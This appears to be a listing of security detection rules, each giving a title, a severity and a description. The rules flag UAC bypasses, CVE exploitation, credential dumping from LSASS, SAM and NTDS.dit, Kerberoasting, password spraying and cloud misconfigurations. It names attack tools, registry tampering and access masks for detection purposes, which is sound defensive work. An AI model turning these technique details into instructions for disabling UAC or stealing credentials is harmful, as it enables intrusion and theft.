UAC Bypass Abusing Winsat Path Parsing - RegistryhighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - RegistryhighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
UAC DisabledmediumDetects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
UAC Notification DisabledmediumDetects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
UAC Secure Desktop Prompt DisabledmediumDetects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
Malware Shellcode in Verclsid Target ProcesshighDetects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
Potential BearLPE ExploitationhighDetects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
Exploiting SetupComplete.cmd CVE-2019-1378highDetects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
Exploiting CVE-2019-1388criticalDetects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
Potential Dridex ActivitycriticalDetects potential Dridex acitvity via specific process patterns
Antivirus PrinterNightmare CVE-2021-34527 Exploit DetectioncriticalDetects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .
CVE-2021-1675 Print Spooler Exploitation Filename PatterncriticalDetects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
InstallerFileTakeOver LPE CVE-2021-41379 File Create EventcriticalDetects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
Potential CVE-2021-41379 Exploitation AttemptcriticalDetects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
Suspicious RazerInstaller Explorer SubprocesshighDetects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
Potential SystemNightmare Exploitation AttemptcriticalDetects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
Moriya Rootkit File CreatedcriticalDetects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
APT PRIVATELOG Image Load PatternhighDetects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
SOURGUM Actor BehaviourshighSuspicious behaviours related to an actor tracked by Microsoft as SOURGUM
Potential CVE-2023-21554 QueueJumper ExploitationhighDetects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
CVE-2022-24527 Microsoft Connected Cache LPEhighDetects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
Suspicious Sysmon as Execution ParenthighDetects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
Exploitation Indicators Of CVE-2023-20198highDetecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI.
Diamond Sleet APT Scheduled Task CreationcriticalDetects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
Lazarus APT DLL Sideloading ActivityhighDetects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command InjectionhighDetects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
Kapeka Backdoor Scheduled Task CreationhighDetects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.
Potential Raspberry Robin Aclui Dll SideLoadinghighDetects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.
Privilege Role Elevation Not Occuring on SAW or PAWhighDetects failed sign-in from a PAW or SAW device
Potential Zerologon (CVE-2020-1472) ExploitationhighDetects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472)
Scheduled Task DeletionlowDetects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
Potential Remote WMI ActiveScriptEventConsumers ActivitymediumDetect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
Scheduled Task Created - FileCreationlowDetects the creation of a scheduled task via file creation.
Potential Shellcode InjectionmediumDetects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
Elevated System Shell SpawnedmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
Scheduled Task Created - RegistrylowDetects the creation of a scheduled task via Registry keys.
AWS Lambda Function Created or InvokedlowDetects when an user creates or invokes a lambda function.
CVE-2021-3156 Exploitation AttempthighDetects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing required to trigger the heap-based buffer overflow.
CVE-2021-3156 Exploitation Attempt BruteforcinghighDetects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing. required to trigger the heap-based buffer overflow.
Potential CVE-2021-4034 Exploitation AttempthighDetects exploitation attempt of the vulnerability described in CVE-2021-4034.
OMIGOD SCX RunAsProvider ExecuteScripthighRule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
Meterpreter or Cobalt Strike Getsystem Service InstallationcriticalDetects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
MSI Spawned Cmd and Powershell Spawned ProcesseshighThis rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes
Always Install Elevated Parent Child CorrelatedhighThis rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege
Windows Kernel and 3rd-Party Drivers Exploits Token StealinghighDetection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level
Malicious Service InstallationscriticalDetects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
Detection of Possible Rotten PotatohighDetection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges
Rare Schtasks CreationslowDetects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
Password Spraying via Explicit CredentialsmediumDetects a single user failing to authenticate to multiple users using explicit credentials.
Multiple Users Failing to Authenticate from Single ProcessmediumDetects failed logins with multiple accounts from a single process on the system.
Failed Logins with Different Accounts from Single Source SystemmediumDetects suspicious failed logins with different user accounts from a single source system
Failed NTLM Logins with Different Accounts from Single Source SystemmediumDetects suspicious failed logins with different user accounts from a single source system
Valid Users Failing to Authenticate From Single Source Using KerberosmediumDetects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.
Disabled Users Failing To Authenticate From Source Using KerberosmediumDetects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.
Invalid Users Failing To Authenticate From Source Using KerberosmediumDetects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.
Valid Users Failing to Authenticate from Single Source Using NTLMmediumDetects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.
Invalid Users Failing To Authenticate From Single Source Using NTLMmediumDetects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.
Multiple Users Remotely Failing To Authenticate From Single SourcemediumDetects a source system failing to authenticate against a remote host with multiple users.
Rare Service InstallationslowDetects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
attack.credential_access 342
Show Rules (342)
Title Level Description
Brute ForcemediumDetects many authentication failures from one source to one destination which is may indicate Brute Force activity
iOS Implant URL PatterncriticalDetects URL pattern used by iOS Implant
Credential Dumping Tools Service ExecutioncriticalDetects well-known credential dumping tools execution via service execution events
Suspicious File Event With Teams ObjectshighDetects an access to authentication tokens and accounts of Microsoft Teams desktop application.
Suspicious Unattend.xml File AccessmediumAttempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process
CrackMapExec File Creation PatternshighDetects suspicious file creation patterns found in logs when CrackMapExec is used
LSASS Memory Dump File CreationhighLSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified
CreateMiniDump HacktoolhighDetects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
Mimikatz MemSSP Default Log File CreationcriticalDetects Mimikatz MemSSP default log file creation
Accessing Encrypted Credentials from Google Chrome Login DatabasemediumAdversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Credential Dumping by LaZagnecriticalDetects LSASS process access by LaZagne for credential dumping.
Credential Dumping Tools Accessing LSASS MemoryhighDetects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools
Credential Dumping by PypykatzcriticalDetects LSASS process access by pypykatz for credential dumping.
CrackMapExecWincriticalDetects CrackMapExecWin Activity as Described by NCSC
GALLIUM ArtefactshighDetects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
Credential Acquisition via Registry Hive DumpinghighDetects Credential Acquisition via Registry Hive Dumping
Registry Dump of SAM Creds and SecretshighAdversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored
Accessing WinAPI in PowerShell for Credentials DumpinghighDetects Accessing to lsass.exe by Powershell
Mimikatz Detection LSASS AccesshighDetects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ)
Activity Related to NTDS.dit Domain Hash RetrievalhighDetects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
SAM Dump to AppDatahighDetects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers
Kubernetes Admission Controller ModificationmediumDetects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
Kubernetes Secrets Modified or DeletedmediumDetects when Kubernetes Secrets are Modified or Deleted.
OpenCanary - MSSQL Login Attempt Via SQLAuthhighDetects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
OpenCanary - MSSQL Login Attempt Via Windows AuthenticationhighDetects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
OpenCanary - MySQL Login AttempthighDetects instances where a MySQL service on an OpenCanary node has had a login attempt.
OpenCanary - REDIS Action Command AttempthighDetects instances where a REDIS service on an OpenCanary node has had an action command attempted.
Antivirus Password Dumper DetectioncriticalDetects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
AWS Route 53 Domain Transfer Lock DisabledlowDetects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.
AWS Route 53 Domain Transferred to Another AccountlowDetects when a request has been made to transfer a Route 53 domain to another AWS account.
Azure Keyvault Key Modified or DeletedmediumIdentifies when a Keyvault Key is modified or deleted in Azure.
Azure Key Vault Modified or DeletedmediumIdentifies when a key vault is modified or deleted.
Azure Keyvault Secrets Modified or DeletedmediumIdentifies when secrets are modified or deleted in Azure.
Azure Kubernetes Admission ControllermediumIdentifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
Azure Kubernetes Network Policy ChangemediumIdentifies when a Azure Kubernetes network policy is modified or deleted.
Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and DeletedmediumDetects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.
Application AppID Uri Configuration ChangeshighDetects when a configuration change is made to an applications AppID URI.
Delegated Permissions Granted For All UsershighDetects when highly privileged delegated permissions are granted on behalf of all users
End User ConsentlowDetects when an end user consents to an application
End User Consent BlockedmediumDetects when end user consent is blocked due to risk-based consent.
Added Owner To ApplicationmediumDetects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.
App Granted Microsoft PermissionshighDetects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
Application URI Configuration ChangeshighDetects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
Change to Authentication MethodmediumChange to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
Multi Factor Authentication Disabled For User AccountmediumDetects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.
Password Reset By User AccountmediumDetect when a user has reset their password in Azure AD
Anomalous TokenhighIndicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.
Anonymous IP AddresshighIndicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.
Password Spray ActivityhighIndicates that a password spray attack has been successfully performed.
Primary Refresh Token Access AttempthighIndicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft
SAML Token Issuer AnomalyhighIndicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns
Account LockoutmediumIdentifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.
Successful Authentications From Countries You Do Not Operate Out OfmediumDetect successful authentications from countries you do not operate out of.
Failed Authentications From Countries You Do Not Operate Out OflowDetect failed authentications from countries you do not operate out of.
Azure AD Only Single Factor Authentication RequiredlowDetect when users are authenticating without MFA being required.
Potential MFA Bypass Using Legacy Client AuthenticationhighDetects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
Sign-in Failure Due to Conditional Access Requirements Not MethighDefine a baseline threshold for failed sign-ins due to Conditional Access failures
Use of Legacy Authentication ProtocolshighAlert on when legacy authentication has been used on an account
Multifactor Authentication DeniedmediumUser has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.
Multifactor Authentication InterruptedmediumIdentifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
User Access Blocked by Azure Conditional AccessmediumDetect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.
Bitbucket User Login FailuremediumDetects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
Cisco Duo Successful MFA Authentication Via Bypass CodemediumDetects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
Google Cloud Kubernetes Admission ControllermediumIdentifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
Google Cloud Kubernetes RoleBindingmediumDetects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.
Google Cloud Kubernetes Secrets Modified or DeletedmediumIdentifies when the Secrets are Modified or Deleted.
Github High Risk Configuration DisabledhighDetects when a user disables a critical security feature for an organization.
Okta Admin Functions Access Through ProxymediumDetects access to Okta admin functions through proxy.
Okta MFA Reset or DeactivatedmediumDetects when an attempt at deactivating or resetting MFA.
Potential Okta Password in AlternateID FieldhighDetects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.
New Okta User CreatedinformationalDetects new user account creation
Cleartext Protocol Usage Via NetflowlowEnsure that all account usernames and authentication credentials are transmitted across networks using encrypted channels Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.
Credentials In Files - LinuxhighDetecting attempts to extract passwords with grep
Linux Keylogging with Pam.dhighDetect attempt to enable auditing of TTY input
Network Sniffing - LinuxlowNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Suspicious History File Operations - LinuxmediumDetects commandline operations on shell history files
Guacamole Two Users Sharing Session AnomalyhighDetects suspicious session with two users present
Copy Passwd Or Shadow From TMP PathhighDetects when the file "passwd" or "shadow" is copied from tmp path
Mount Execution With Hidepid ParametermediumDetects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
Linux Recon IndicatorshighDetects events with patterns found in commands used for reconnaissance on linux systems
Credentials from Password Stores - KeychainmediumDetects passwords dumps from Keychain
Credentials In FileshighDetecting attempts to extract passwords with grep and laZagne
GUI Input Capture - macOSlowDetects attempts to use system dialog prompts to capture user credentials
Network Sniffing - MacOsinformationalDetects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Suspicious History File OperationsmediumDetects commandline operations on shell history files
Cisco Collect DatalowCollect pertinent data from the configuration files
Cisco Crypto CommandshighShow when private keys are being exported from the device, or when new certificates are installed
Cisco Show Commands InputmediumSee what commands are being input into the device by other people, full credentials can be in the history
Cisco SniffingmediumShow when a monitor or a span/rspan is setup or modified
Cisco BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing
Cisco LDP Authentication FailureslowDetects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
Cleartext Protocol UsagelowEnsure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.
Huawei BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5lowDetects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
Possible Impacket SecretDump Remote Activity - ZeekhighDetect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml
Transferring Files with Credential Data via Network Shares - ZeekmediumTransferring files with well-known filenames (sensitive files with credential data) using network shares
Kerberos Network Traffic RC4 Ticket EncryptionmediumDetects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting
Suspicious Network Communication With IPFSlowDetects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.
Hack Tool User AgenthighDetects suspicious user agent strings user by hack tools in proxy logs
Mimikatz UsehighThis method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
Potential Credential Dumping Via WER - ApplicationhighDetects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential
Ntdsutil AbusemediumDetects potential abuse of ntdsutil to dump ntds.dit database
Audit CVE EventcriticalDetects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
MSSQL Server Failed LogonlowDetects failed logon attempts from clients to MSSQL server.
MSSQL Server Failed Logon From External NetworkmediumDetects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.
Certificate Private Key AcquiredmediumDetects when an application acquires a certificate private key
Certificate Exported From Local Certificate StoremediumDetects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.
Standard User In High Privileged GroupmediumDetect standard users login that are part of high privileged groups such as the Administrator group
NTLM Brute ForcemediumDetects common NTLM brute force device names
ADCS Certificate Template Configuration VulnerabilitylowDetects certificate creation with template allowing risk permission subject
ADCS Certificate Template Configuration Vulnerability with Risky EKUhighDetects certificate creation with template allowing risk permission subject and risky EKU
Active Directory Replication from Non Machine AccountcriticalDetects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.
Mimikatz DC SynchighDetects Mimikatz DC sync security events
DPAPI Domain Backup Key ExtractionhighDetects tools extracting LSA secret DPAPI domain backup key from Domain Controllers
DPAPI Domain Master Key Backup AttemptmediumDetects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.
Possible Impacket SecretDump Remote ActivityhighDetect AD credential dumping using impacket secretdump HKTL
Kerberoasting Activity - Initial QuerymediumThis rule will collect the data needed to start looking into possible kerberoasting activity. Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds. You can then set a threshold for the number of requests and time between the requests to turn this into an alert.
LSASS Access From Non System AccountmediumDetects potential mimikatz-like tools accessing LSASS from non system account
Credential Dumping Tools Service Execution - SecurityhighDetects well-known credential dumping tools execution via service execution events
WCE wceaux.dll AccesscriticalDetects wceaux.dll access while WCE pass-the-hash remote command execution on source host
Windows Pcap DriversmediumDetects Windows Pcap driver installation based on a list of associated .sys files.
Possible PetitPotam Coerce Authentication AttempthighDetect PetitPotam coerced authentication activity.
PetitPotam Suspicious Kerberos TGT RequesthighDetect suspicious Kerberos TGT requests. Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.
Possible DC Shadow AttackmediumDetects DCShadow via create new SPN
Register new Logon Process by RubeushighDetects potential use of Rubeus via registered new trusted logon process
Replay Attack DetectedhighDetects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client
SAM Registry Hive Handle RequesthighDetects handles requested to SAM registry hive
Kerberos ManipulationhighDetects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.
Password Dumper Activity on LSASShighDetects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
Potentially Suspicious AccessMask Requested From LSASSmediumDetects process handle on LSASS process with certain access mask
Possible Shadow Credentials AddedhighDetects possible addition of shadow credentials to an active directory object.
Suspicious Kerberos RC4 Ticket EncryptionmediumDetects service ticket requests using RC4 encryption type
Suspicious Teams Application Related ObjectAcess EventhighDetects an access to authentication tokens and accounts of Microsoft Teams desktop application.
Transferring Files with Credential Data via Network SharesmediumTransferring files with well-known filenames (sensitive files with credential data) using network shares
VSSAudit Security Event Source RegistrationinformationalDetects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.
External Remote RDP Logon from Public IPmediumDetects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
External Remote SMB Logon from Public IPhighDetects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
Potential Privilege Escalation via Local Kerberos Relay over LDAPhighDetects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.
RottenPotato Like Attack PatternhighDetects logon events that have characteristics of events generated during an attack with RottenPotato and the like
Suspicious Rejected SMB Guest Logon From IPmediumDetect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service
Active Directory Certificate Services Denied Certificate Enrollment RequestlowDetects denied requests by Active Directory Certificate Services. Example of these requests denial include issues with permissions on the certificate template or invalid signatures.
Potential CVE-2021-42287 Exploitation AttemptmediumThe attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
No Suitable Encryption Key Found For Generating Kerberos TicketlowDetects errors when a target server doesn't have suitable keys for generating kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.
Critical Hive In Suspicious Location Access Bits ClearedhighDetects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.
Volume Shadow Copy MountlowDetects volume shadow copy mount via Windows event log
Credential Dumping Tools Service Execution - SystemhighDetects well-known credential dumping tools execution via service execution events
LSASS Access Detected via Attack Surface ReductionhighDetects Access to LSASS Process
Remote Thread Created In KeePass.EXEhighDetects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity
Remote Thread Creation In Mstsc.Exe From Suspicious LocationhighDetects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.
Potential Credential Dumping Attempt Via PowerShell Remote ThreadhighDetects remote thread creation by PowerShell processes into "lsass.exe"
Password Dumper Remote Thread in LSASShighDetects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.
Credential Manager Access By Uncommon ApplicationsmediumDetects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
Access To Crypto Currency Wallets By Uncommon ApplicationsmediumDetects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.
Access To Windows Credential History File By Uncommon ApplicationsmediumDetects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
Access To Windows DPAPI Master Keys By Uncommon ApplicationsmediumDetects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
Access To Potentially Sensitive Sysvol Files By Uncommon ApplicationsmediumDetects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
Microsoft Teams Sensitive File Access By Uncommon ApplicationsmediumDetects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
Cred Dump Tools Dropped FileshighFiles with well-known filenames (parts of credential dump software or files produced by them) creation
HackTool - CrackMapExec File IndicatorshighDetects file creation events with filename patterns used by CrackMapExec.
HackTool - Typical HiveNightmare SAM File ExporthighDetects files written by the different tools that exploit HiveNightmare
HackTool - Dumpert Process Dumper Default FilecriticalDetects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
HackTool - Mimikatz Kirbi File CreationcriticalDetects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
HackTool - NPPSpy Hacktool UsagehighDetects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
HackTool - QuarksPwDump Dump FilecriticalDetects a dump file written by QuarksPwDump password dumper
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-SecretsdumphighDetects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
HackTool - SafetyKatz Dump IndicatorhighDetects default lsass dump filename generated by SafetyKatz.
LSASS Process Memory Dump FileshighDetects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
LSASS Process Dump Artefact In CrashDumps FolderhighDetects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
WerFault LSASS Process Memory DumphighDetects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
NTDS.DIT CreatedlowDetects creation of a file named "ntds.dit" (Active Directory Database)
NTDS.DIT Creation By Uncommon Parent ProcesshighDetects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
